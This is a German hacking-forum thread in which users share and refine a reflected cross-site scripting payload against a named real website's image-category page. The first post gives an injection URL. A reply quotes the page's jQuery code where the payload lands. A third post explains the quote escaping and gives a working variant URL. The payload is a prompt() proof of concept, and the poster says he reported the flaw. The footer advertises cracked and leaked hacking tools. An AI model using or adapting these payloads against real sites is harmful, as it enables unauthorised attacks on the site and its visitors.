Zum Inhalt wechseln

Als Gast hast du nur eingeschränkten Zugriff!


Anmelden 

Benutzerkonto erstellen

Du bist nicht angemeldet und hast somit nur einen sehr eingeschränkten Zugriff auf die Features unserer Community.
Um vollen Zugriff zu erlangen musst du dir einen Account erstellen. Der Vorgang sollte nicht länger als 1 Minute dauern.

  • Antworte auf Themen oder erstelle deine eigenen.
  • Schalte dir alle Downloads mit Highspeed & ohne Wartezeit frei.
  • Erhalte Zugriff auf alle Bereiche und entdecke interessante Inhalte.
  • Tausche dich mich anderen Usern in der Shoutbox oder via PN aus.
 

   

Foto

xss cantwo.com

- - - - -

  • Bitte melde dich an um zu Antworten
3 Antworten in diesem Thema

#1
XoiL

XoiL

    Leecher

  • Banned
  • PIP
  • Likes
    2
  • 1 Beiträge
  • 14 Bedankt
  • Android [root], Blackberry
  • Linux
nebenbei
http://www.cantwo.de/einzelbilder.php?kategorie=%27%22%28%29%26%251%3CScRiPt%20%3Eprompt%28byxoil%29%3C%2fScRiPt%3E

lg

#2
juPP

juPP

    Hacker

  • Premium Member
  • Likes
    49
  • 174 Beiträge
  • 61 Bedankt
  • 000000
  • Blackberry
  • Windows, Linux
Nanana. lass doch die armen writer in ruhe :-P :-P ;)

Ich kann die XSS zwar nachvollziehen, aber ausgeführt wird es nicht. Liegt vielleicht daran dein injezierter code im JS bereich ist und somit ein <script> unnötig / berflüssig macht.

<script>
            $(document).ready(function(){
                //Examples of how to assign the ColorBox event to elements
                $(".group'"()&%1<ScRiPt >prompt(byxoil)</ScRiPt>").colorbox({rel:'group'"()&%1<ScRiPt >prompt(byxoil)</ScRiPt>', transition:"none", width:"90%"});
                $(".group2").colorbox({rel:'group2', transition:"fade"});
                $(".group3").colorbox({rel:'group3', transition:"none", width:"75%", height:"75%"});
                $(".group4").colorbox({rel:'group4', slideshow:true});
                
                $(".callbacks").colorbox({
                    onOpen:function(){ alert('onOpen: colorbox is about to open'); },
                    onload:function(){ alert('onload: colorbox has started to load the targeted content'); },
                    onComplete:function(){ alert('onComplete: colorbox has displayed the loaded content'); },
                    onCleanup:function(){ alert('onCleanup: colorbox has begun the close process'); },
                    onClosed:function(){ alert('onClosed: colorbox has completely closed'); }
                });
                
                //Example of preserving a Javascript event for inline calls.
                $("#click").click(function(){
                    $('#click').css({"background-color":"#f00", "color":"#fff", "cursor":"inherit"}).text("Open this window again and this message will still be here.");
                    return false;
                });
            });
        </script>

... hier könnte Ihre Werbung stehen ;)

#3
XoiL

XoiL

    Leecher

  • Banned
  • PIP
  • Likes
    2
  • 1 Beiträge
  • 14 Bedankt
  • Android [root], Blackberry
  • Linux
hab die eh gemeldet weil ich cantwo total super finde deswegen noch fix geshared

lg

#4
Laggy

Laggy

    Noob

  • Premium Member
  • Likes
    8
  • 11 Beiträge
  • 0 Bedankt
  • Vuln Reporter

Ich kann die XSS zwar nachvollziehen, aber ausgeführt wird es nicht. Liegt vielleicht daran dein injezierter code im JS bereich ist und somit ein <script> unnötig / berflüssig macht.

Liegt daran, dass Text in der Klammer steht (zahlen würden gehn) und sowohl ' wie auch " gefilert und durch /' bzw /" ersetzt werden
So funzts dann ;)
http://www.cantwo.de/einzelbilder.php?kategorie=<script>prompt(/byxoil/)</script>

Bearbeitet von Laggy, 23 October 2013 - 17:28 Uhr.

Eingefügtes Bild




  Thema Forum Themenstarter Statistik Letzter Beitrag

Besucher die dieses Thema lesen:

Mitglieder: , Gäste: , unsichtbare Mitglieder:


This topic has been visited by 4 user(s)


    Bot4ng, komando2212, Laggy, MarkusxX
Die besten Hacking Tools zum downloaden : Released, Leaked, Cracked. Größte deutschsprachige Hacker Sammlung.